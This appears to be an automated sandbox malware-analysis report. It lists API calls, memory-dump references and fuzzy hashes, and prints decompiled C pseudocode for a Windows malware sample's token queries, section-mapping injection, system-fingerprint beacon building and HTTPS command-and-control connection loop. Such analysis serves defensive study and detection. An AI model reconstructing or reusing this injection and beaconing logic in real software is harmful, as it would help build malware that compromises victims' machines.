0x07f79a73
0x07f79a85
0x07f79a8f
0x07f79a93
0x07f79aa2
0x07f79aa6
0x07f79aaf
0x07f79ab7
0x07f79ab7
0x07f79ab9
0x07f79ab9
0x07f79ac1
0x07f79ac7
0x07f79acb
0x07f79acb
0x07f79ad6

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 07F79A56
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 07F79A69
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 07F79A85

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 07F79AA2
memcpy.NTDLL(00000000,00000000,0000001C), ref: 07F79AAF
NtClose.NTDLL(?), ref: 07F79AC1
NtClose.NTDLL(00000000), ref: 07F79ACB

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: 25919632698b3fe72df506107dc3ecca9422fd98207747ce9595af6841ab327c
Instruction ID: 03a3a037829f5543bc746b17cf539757eea17d8810f287923a53612229bedbaf
Opcode Fuzzy Hash: 25919632698b3fe72df506107dc3ecca9422fd98207747ce9595af6841ab327c
Instruction Fuzzy Hash: 6B21E7B294011CBBDB01EFA5DC459DEBFBDEB08745F144026F905E6210D7B19A44DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00981C90, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00981C90(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00981703(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00981c99
0x00981ca0
0x00981ca1
0x00981ca2
0x00981ca3
0x00981ca4
0x00981cb5
0x00981cb9
0x00981ccd
0x00981cd0
0x00981cd3
0x00981cda
0x00981cdd
0x00981ce4
0x00981ce7
0x00981cea
0x00981ced
0x00981cf2
0x00981d2d
0x00981cf4
0x00981cf7
0x00981cfd
0x00981d02
0x00981d06
0x00981d24
0x00981d08
0x00981d0f
0x00981d1d
0x00981d1d
0x00981d06
0x00981d35

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 00981CED

Part of subcall function 00981703: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00981D02,00000002,00000000,?,?,00000000,?,?,00981D02,00000002), ref: 00981730

memset.NTDLL ref: 00981D0F

Strings

@, xrefs: 00981CDD

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
Instruction ID: 7015a42a2dca41dfb5254d091450574c8e7fb2fe7dd59b8750067f129efc2a52
Opcode Fuzzy Hash: a0432050cf41c84421b6c7dc0a27d288bc4abc767ba214151e892c20fd89f3a1
Instruction Fuzzy Hash: 05211DB5D0020DAFCB11DFA9C884ADEFBB9EF48354F108829E515F3210D734AA458B60

Uniqueness

Uniqueness Score: -1.00%

Function 00981703, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00981703(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x00981715
0x0098171b
0x00981729
0x00981730
0x00981735
0x0098173b
0x00000000
0x0098173c
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,00981D02,00000002,00000000,?,?,00000000,?,?,00981D02,00000002), ref: 00981730

Memory Dump Source

Source File: 00000009.00000002.517301857.0000000000981000.00000040.00020000.sdmp, Offset: 00980000, based on PE: true

Associated: 00000009.00000002.517286660.0000000000980000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.517312305.0000000000984000.00000040.00020000.sdmp Download File
Associated: 00000009.00000002.517328108.0000000000986000.00000040.00020000.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 56119163a0948d5f82a4a688e3d758cafeb3b6de3befd8e6356f36c89f4eaca8
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: 61F012B590020CBFDB119FA5CC85CAFBBBDEB44394B10493DB152E2190D6319E499B60

Uniqueness

Uniqueness Score: -1.00%

Function 07F79BF1, Relevance: 34.7, APIs: 23, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E07F79BF1(long __eax, void* __ecx, void* __edx, intOrPtr _a4, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				void* _t38;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t50;
				intOrPtr _t54;
				intOrPtr* _t56;
				intOrPtr _t62;
				intOrPtr _t68;
				intOrPtr _t71;
				intOrPtr _t74;
				int _t77;
				intOrPtr _t78;
				int _t81;
				intOrPtr _t83;
				int _t86;
				intOrPtr* _t89;
				intOrPtr* _t90;
				void* _t91;
				void* _t95;
				void* _t96;
				void* _t97;
				intOrPtr _t98;
				void* _t100;
				int _t101;
				void* _t102;
				void* _t103;
				void* _t105;
				void* _t106;
				void* _t108;

				_t95 = __edx;
				_t91 = __ecx;
				_t25 = __eax;
				_t105 = _a16;
				_v4 = 8;
				if(__eax == 0) {
					_t25 = GetTickCount();
				}
				_t26 =  *0x7f7d018; // 0xd96449c3
				asm("bswap eax");
				_t27 =  *0x7f7d014; // 0x3a87c8cd
				asm("bswap eax");
				_t28 = E07F7D010; // 0xd8d2f808
				asm("bswap eax");
				_t29 =  *0x7f7d00c; // 0x8f8f86c2
				asm("bswap eax");
				_t30 =  *0x7f7d2a8; // 0xaaa5a8
				_t3 = _t30 + 0x7f7e633; // 0x74666f73
				_t101 = wsprintfA(_t105, _t3, 2, 0x3d163, _t29, _t28, _t27, _t26,  *0x7f7d02c,  *0x7f7d004, _t25);
				_t33 = E07F73288();
				_t34 =  *0x7f7d2a8; // 0xaaa5a8
				_t4 = _t34 + 0x7f7e673; // 0x74707526
				_t37 = wsprintfA(_t101 + _t105, _t4, _t33);
				_t108 = _t106 + 0x38;
				_t102 = _t101 + _t37; // executed
				_t38 = E07F7831C(_t91); // executed
				_t96 = _t38;
				if(_t96 != 0) {
					_t83 =  *0x7f7d2a8; // 0xaaa5a8
					_t6 = _t83 + 0x7f7e8d4; // 0x736e6426
					_t86 = wsprintfA(_t102 + _t105, _t6, _t96);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t86;
					HeapFree( *0x7f7d238, 0, _t96);
				}
				_t97 = E07F79267();
				if(_t97 != 0) {
					_t78 =  *0x7f7d2a8; // 0xaaa5a8
					_t8 = _t78 + 0x7f7e8dc; // 0x6f687726
					_t81 = wsprintfA(_t102 + _t105, _t8, _t97);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t81;
					HeapFree( *0x7f7d238, 0, _t97);
				}
				_t98 =  *0x7f7d32c; // 0x8a295b0
				_a32 = E07F7284E(0x7f7d00a, _t98 + 4);
				_t42 =  *0x7f7d2d0; // 0x0
				if(_t42 != 0) {
					_t74 =  *0x7f7d2a8; // 0xaaa5a8
					_t11 = _t74 + 0x7f7e8b6; // 0x3d736f26
					_t77 = wsprintfA(_t102 + _t105, _t11, _t42);
					_t108 = _t108 + 0xc;
					_t102 = _t102 + _t77;
				}
				_t43 =  *0x7f7d2cc; // 0x0
				if(_t43 != 0) {
					_t71 =  *0x7f7d2a8; // 0xaaa5a8
					_t13 = _t71 + 0x7f7e88d; // 0x3d706926
					wsprintfA(_t102 + _t105, _t13, _t43);
				}
				if(_a32 != 0) {
					_t100 = RtlAllocateHeap( *0x7f7d238, 0, 0x800);
					if(_t100 != 0) {
						E07F73239(GetTickCount());
						_t50 =  *0x7f7d32c; // 0x8a295b0
						__imp__(_t50 + 0x40);
						asm("lock xadd [eax], ecx");
						_t54 =  *0x7f7d32c; // 0x8a295b0
						__imp__(_t54 + 0x40);
						_t56 =  *0x7f7d32c; // 0x8a295b0
						_t103 = E07F77B8D(1, _t95, _t105,  *_t56);
						asm("lock xadd [eax], ecx");
						if(_t103 != 0) {
							StrTrimA(_t103, 0x7f7c28c);
							_push(_t103);
							_t62 = E07F7A677();
							_v16 = _t62;
							if(_t62 != 0) {
								_t89 = __imp__;
								 *_t89(_t103, _v0);
								 *_t89(_t100, _a4);
								_t90 = __imp__;
								 *_t90(_t100, _v28);
								 *_t90(_t100, _t103);
								_t68 = E07F7933A(0xffffffffffffffff, _t100, _v28, _v24); // executed
								_v52 = _t68;
								if(_t68 != 0 && _t68 != 0x10d2) {
									E07F75433();
								}
								HeapFree( *0x7f7d238, 0, _v44);
							}
							HeapFree( *0x7f7d238, 0, _t103);
						}
						RtlFreeHeap( *0x7f7d238, 0, _t100); // executed
					}
					HeapFree( *0x7f7d238, 0, _a24);
				}
				RtlFreeHeap( *0x7f7d238, 0, _t105); // executed
				return _a4;
			}

0x07f79bf1
0x07f79bf1
0x07f79bf1
0x07f79bf6
0x07f79bfc
0x07f79c06
0x07f79c08
0x07f79c08
0x07f79c15
0x07f79c20
0x07f79c23
0x07f79c2e
0x07f79c31
0x07f79c36
0x07f79c39
0x07f79c3e
0x07f79c41
0x07f79c4d
0x07f79c5a
0x07f79c5c
0x07f79c62
0x07f79c67
0x07f79c72
0x07f79c74
0x07f79c77
0x07f79c79
0x07f79c7e
0x07f79c82
0x07f79c84
0x07f79c89
0x07f79c95
0x07f79c97
0x07f79ca3
0x07f79ca5
0x07f79ca5
0x07f79cb0
0x07f79cb4
0x07f79cb6
0x07f79cbb
0x07f79cc7
0x07f79cc9
0x07f79cd5
0x07f79cd7
0x07f79cd7
0x07f79cdd
0x07f79cf0
0x07f79cf4
0x07f79cfb
0x07f79cfe
0x07f79d03
0x07f79d0e
0x07f79d10
0x07f79d13
0x07f79d13
0x07f79d15
0x07f79d1c
0x07f79d1f
0x07f79d24
0x07f79d2e
0x07f79d30
0x07f79d38
0x07f79d51
0x07f79d55
0x07f79d61
0x07f79d66
0x07f79d6f
0x07f79d80
0x07f79d84
0x07f79d8d
0x07f79d93
0x07f79da0
0x07f79dad
0x07f79db3
0x07f79dbf
0x07f79dc5
0x07f79dc6
0x07f79dcb
0x07f79dd1
0x07f79dd7
0x07f79dde
0x07f79de5
0x07f79deb
0x07f79df2
0x07f79df6
0x07f79e01
0x07f79e06
0x07f79e0c
0x07f79e15
0x07f79e15
0x07f79e26
0x07f79e26
0x07f79e35
0x07f79e35
0x07f79e44
0x07f79e44
0x07f79e56
0x07f79e56
0x07f79e65
0x07f79e76

APIs

GetTickCount.KERNEL32 ref: 07F79C08
wsprintfA.USER32 ref: 07F79C55
wsprintfA.USER32 ref: 07F79C72
wsprintfA.USER32 ref: 07F79C95
HeapFree.KERNEL32(00000000,00000000), ref: 07F79CA5
wsprintfA.USER32 ref: 07F79CC7
HeapFree.KERNEL32(00000000,00000000), ref: 07F79CD7
wsprintfA.USER32 ref: 07F79D0E
wsprintfA.USER32 ref: 07F79D2E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 07F79D4B
GetTickCount.KERNEL32 ref: 07F79D5B
RtlEnterCriticalSection.NTDLL(08A29570), ref: 07F79D6F
RtlLeaveCriticalSection.NTDLL(08A29570), ref: 07F79D8D

Part of subcall function 07F77B8D: lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,74ECC740,?,?,07F79DA0,?,08A295B0), ref: 07F77BB8
Part of subcall function 07F77B8D: lstrlen.KERNEL32(?,?,?,07F79DA0,?,08A295B0), ref: 07F77BC0
Part of subcall function 07F77B8D: strcpy.NTDLL ref: 07F77BD7
Part of subcall function 07F77B8D: lstrcat.KERNEL32(00000000,?), ref: 07F77BE2
Part of subcall function 07F77B8D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,07F79DA0,?,08A295B0), ref: 07F77BFF

StrTrimA.SHLWAPI(00000000,07F7C28C,?,08A295B0), ref: 07F79DBF

Part of subcall function 07F7A677: lstrlen.KERNEL32(08A29B78,00000000,00000000,74ECC740,07F79DCB,00000000), ref: 07F7A687
Part of subcall function 07F7A677: lstrlen.KERNEL32(?), ref: 07F7A68F
Part of subcall function 07F7A677: lstrcpy.KERNEL32(00000000,08A29B78), ref: 07F7A6A3
Part of subcall function 07F7A677: lstrcat.KERNEL32(00000000,?), ref: 07F7A6AE

lstrcpy.KERNEL32(00000000,?), ref: 07F79DDE
lstrcpy.KERNEL32(00000000,00000000), ref: 07F79DE5
lstrcat.KERNEL32(00000000,?), ref: 07F79DF2
lstrcat.KERNEL32(00000000,00000000), ref: 07F79DF6

Part of subcall function 07F7933A: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,751881D0), ref: 07F793EC

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 07F79E26
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 07F79E35
RtlFreeHeap.NTDLL(00000000,00000000,?,08A295B0), ref: 07F79E44
HeapFree.KERNEL32(00000000,00000000), ref: 07F79E56
RtlFreeHeap.NTDLL(00000000,?), ref: 07F79E65

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Free$wsprintf$lstrcatlstrlen$lstrcpy$CountCriticalSectionTickTrim$AllocateEnterLeaveObjectSingleWaitstrcpy
String ID:
API String ID: 3080378247-0
Opcode ID: f8f376b4f174a184a9cfbee95e881d509fd377177f11dce89c1ba3b38bd98bb1
Instruction ID: cd0b81239bb0992650434542238dd48cb0507378a9c5e371f3f9f4238d756692
Opcode Fuzzy Hash: f8f376b4f174a184a9cfbee95e881d509fd377177f11dce89c1ba3b38bd98bb1
Instruction Fuzzy Hash: 3D617DB1600209AFC711EB74EC4AE5A7BECEF48759F480119F908D7360DB29E816DB76

Uniqueness

Uniqueness Score: -1.00%

Function 07F7A85C, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 126
networkstringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E07F7A85C(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E07F71525(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E07F78B22(_t56);
					} else {
						E07F78B22( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E07F7A7F1) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x1bb, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E07F729C0( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x7f7d2a8; // 0xaaa5a8
						_t15 = _t59 + 0x7f7e743; // 0x544547
						_v8 = 0x84c03180;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84c03180, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x07f7a85c
0x07f7a85c
0x07f7a867
0x07f7a86e
0x07f7a876
0x07f7a880
0x07f7a886
0x07f7a899
0x07f7a8a9
0x07f7a89b
0x07f7a89e
0x07f7a8a3
0x07f7a8a3
0x07f7a899
0x07f7a8b9
0x07f7a8bf
0x07f7a8c4
0x07f7a9b0
0x00000000
0x07f7a8df
0x07f7a8e2
0x07f7a8f8
0x07f7a8fe
0x07f7a903
0x07f7a92b
0x07f7a93e
0x07f7a948
0x07f7a94b
0x07f7a951
0x07f7a956
0x00000000
0x00000000
0x07f7a95a
0x07f7a966
0x07f7a977
0x07f7a979
0x07f7a98a
0x07f7a98a
0x07f7a99a
0x00000000
0x07f7a9ac
0x00000000
0x07f7a9ac
0x00000000
0x00000000
0x00000000
0x07f7a903

APIs

lstrlen.KERNEL32(?,00000008,75144D40), ref: 07F7A86E

Part of subcall function 07F71525: RtlAllocateHeap.NTDLL(00000000,00000000,07F71278), ref: 07F71531

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 07F7A891
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 07F7A8B9
InternetSetStatusCallback.WININET(00000000,07F7A7F1), ref: 07F7A8D0
ResetEvent.KERNEL32(?), ref: 07F7A8E2
InternetConnectA.WININET(?,?,000001BB,00000000,00000000,00000003,00000000,?), ref: 07F7A8F8
GetLastError.KERNEL32 ref: 07F7A905
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84C03180,?), ref: 07F7A94B
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 07F7A969
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 07F7A98A
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 07F7A996
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 07F7A9A6
GetLastError.KERNEL32 ref: 07F7A9B0

Part of subcall function 07F78B22: RtlFreeHeap.NTDLL(00000000,00000000,07F7131A,00000000,?,?,00000000), ref: 07F78B2E

Strings

b p, xrefs: 07F7A94B

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID: b p
API String ID: 2290446683-262421234
Opcode ID: 8ef5e24a5b5ea94574c005070439e7b36c4140f59de699bf56c22028aa0b3d54
Instruction ID: ba3da21ded6adb1eab3c7346d725d18f3f442da96d635959f208bca6b6e859fc
Opcode Fuzzy Hash: 8ef5e24a5b5ea94574c005070439e7b36c4140f59de699bf56c22028aa0b3d54
Instruction Fuzzy Hash: EF419DB1A00208BFD7219FB9DC89E9F7BBDEF89704B19892AF542D1190E770A515CA20

Uniqueness

Uniqueness Score: -1.00%

Function 07F77C3D, Relevance: 16.6, APIs: 11, Instructions: 150
timememoryCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E07F77C3D(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				struct %anon52 _v8;
				long _v12;
				char _v16;
				char _v20;
				signed int _v24;
				intOrPtr _v32;
				union _LARGE_INTEGER _v36;
				intOrPtr _v40;
				void* _v44;
				void _v88;
				char _v92;
				struct %anon52 _t46;
				intOrPtr _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t60;
				long _t64;
				signed int _t65;
				void* _t68;
				void* _t70;
				signed int _t71;
				intOrPtr _t73;
				intOrPtr _t76;
				void** _t78;
				void* _t80;

				_t73 = __edx;
				_v92 = 0;
				memset( &_v88, 0, 0x2c);
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v44 = _t46;
				if(_t46 == 0) {
					_v8.LowPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x7f7d240);
					_v20 = 0;
					_v16 = 0;
					L07F7AF6E();
					_v36.LowPart = _t46;
					_v32 = _t73;
					SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0);
					_t51 =  *0x7f7d26c; // 0x590
					_v40 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
					_v8.LowPart = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x7f7d24c = 5;
						} else {
							_t68 = E07F75319(_t73); // executed
							if(_t68 != 0) {
								goto L4;
							}
						}
						_v12 = 0;
						L6:
						L6:
						if(_v12 == 1 && ( *0x7f7d260 & 0x00000001) == 0) {
							_v12 = 2;
						}
						_t71 = _v12;
						_t58 = _t71 << 4;
						_t76 = _t80 + (_t71 << 4) - 0x54;
						_t72 = _t71 + 1;
						_v24 = _t71 + 1;
						_t60 = E07F72C58(_t72, _t76, _t72, _t80 + _t58 - 0x58, _t76,  &_v20,  &_v16); // executed
						_v8.LowPart = _t60;
						if(_t60 != 0) {
							goto L17;
						}
						_t65 = _v24;
						_v12 = _t65;
						_t90 = _t65 - 3;
						if(_t65 != 3) {
							goto L6;
						} else {
							_v8.LowPart = E07F79870(_t72, _t90,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t60 - 0x10d2;
						if(_t60 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x7f7d244);
							goto L21;
						} else {
							__eflags =  *0x7f7d248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t60 = E07F75433();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x7f7d248);
								L21:
								L07F7AF6E();
								_v36.LowPart = _t60;
								_v32 = _t76;
								SetWaitableTimer(_v44,  &_v36, 0, 0, 0, 0); // executed
								_t64 = WaitForMultipleObjects(2,  &_v44, 0, 0xffffffff);
								_v8.LowPart = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t78 =  &_v92;
					_t70 = 3;
					do {
						_t54 =  *_t78;
						if(_t54 != 0) {
							HeapFree( *0x7f7d238, 0, _t54);
						}
						_t78 =  &(_t78[4]);
						_t70 = _t70 - 1;
					} while (_t70 != 0);
					CloseHandle(_v44);
				}
				return _v8;
				goto L25;
			}

0x07f77c3d
0x07f77c4f
0x07f77c52
0x07f77c5e
0x07f77c64
0x07f77c69
0x07f77dd0
0x07f77c6f
0x07f77c6f
0x07f77c71
0x07f77c76
0x07f77c77
0x07f77c7d
0x07f77c80
0x07f77c83
0x07f77c91
0x07f77c9c
0x07f77c9f
0x07f77ca1
0x07f77cae
0x07f77cb8
0x07f77cba
0x07f77cbf
0x07f77cc4
0x07f77ccf
0x07f77ccf
0x07f77cc6
0x07f77cc6
0x07f77ccd
0x00000000
0x00000000
0x07f77ccd
0x07f77cd9
0x00000000
0x07f77cdc
0x07f77ce0
0x07f77ceb
0x07f77ceb
0x07f77cf2
0x07f77cfb
0x07f77d02
0x07f77d0b
0x07f77d0e
0x07f77d11
0x07f77d16
0x07f77d1b
0x00000000
0x00000000
0x07f77d1d
0x07f77d20
0x07f77d23
0x07f77d26
0x00000000
0x07f77d28
0x07f77d37
0x07f77d37
0x00000000
0x07f77d65
0x07f77d65
0x07f77d6a
0x07f77d89
0x07f77d8b
0x07f77d90
0x07f77d91
0x00000000
0x07f77d6c
0x07f77d6c
0x07f77d72
0x00000000
0x07f77d74
0x07f77d74
0x07f77d79
0x07f77d7b
0x07f77d80
0x07f77d81
0x07f77d97
0x07f77d97
0x07f77d9f
0x07f77daa
0x07f77dad
0x07f77db8
0x07f77dba
0x07f77dbd
0x07f77dbf
0x00000000
0x07f77dc5
0x00000000
0x07f77dc5
0x07f77dbf
0x07f77d72
0x00000000
0x07f77d6a
0x07f77d3a
0x07f77d3c
0x07f77d3f
0x07f77d40
0x07f77d40
0x07f77d44
0x07f77d4e
0x07f77d4e
0x07f77d54
0x07f77d57
0x07f77d57
0x07f77d5d
0x07f77d5d
0x07f77dda
0x00000000

APIs

memset.NTDLL ref: 07F77C52
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 07F77C5E
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 07F77C83
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 07F77C9F
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 07F77CB8
HeapFree.KERNEL32(00000000,00000000), ref: 07F77D4E
CloseHandle.KERNEL32(?), ref: 07F77D5D
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 07F77D97
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,07F7312C,?), ref: 07F77DAD
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 07F77DB8

Part of subcall function 07F75319: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,08A29368,00000000,?,7519F710,00000000,7519F730), ref: 07F75368
Part of subcall function 07F75319: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,08A293A0,?,00000000,30314549,00000014,004F0053,08A2935C), ref: 07F75405
Part of subcall function 07F75319: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,07F77CCB), ref: 07F75417

GetLastError.KERNEL32 ref: 07F77DCA

Memory Dump Source

Source File: 00000009.00000002.523926054.0000000007F71000.00000020.00020000.sdmp, Offset: 07F70000, based on PE: true

Associated: 00000009.00000002.523909294.0000000007F70000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523948652.0000000007F7C000.00000002.00020000.sdmp Download File
Associated: 00000009.00000002.523958802.0000000007F7D000.00000004.00020000.sdmp Download File
Associated: 00000009.00000002.523966310.0000000007F7F000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
String ID:
API String ID: 3521023985-0
Opcode ID: 0fbe63afe047ee4375556bceef5d3cab14f795b6848485514c317ee7856cf266
Instruction ID: 84f27985b900451f183e22fe17761ac8f9ad0fe4ab3591bbfafd7bb2393f579c
Opcode Fuzzy Hash: 0fbe63afe047ee4375556bceef5d3cab14f795b6848485514c317ee7856cf266
